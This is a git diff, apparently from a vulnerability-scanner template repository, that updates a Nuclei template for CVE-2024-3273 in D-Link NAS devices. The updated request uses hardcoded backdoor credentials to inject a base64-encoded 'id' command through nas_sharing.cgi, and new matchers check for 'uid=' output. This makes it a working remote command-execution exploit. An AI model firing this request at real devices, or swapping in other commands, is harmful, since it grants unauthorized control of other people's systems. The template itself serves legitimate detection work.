Update CVE-2024-3273.yaml
parent
821ee22396
commit
bb6725de3c
|
@ -23,16 +23,26 @@ info:
|
|||
fofa-query: app="D_Link-DNS-ShareCenter"
|
||||
tags: cve,cve2024,dlink,nas
|
||||
|
||||
variables:
|
||||
cmd: "id"
|
||||
|
||||
http:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=ZWNobyB0ZXN0"
|
||||
- "{{BaseURL}}/cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system={{base64(cmd)}}"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<auth_state>1</auth_state>"
|
||||
- "uid="
|
||||
condition: and
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
Loading…
Reference in New Issue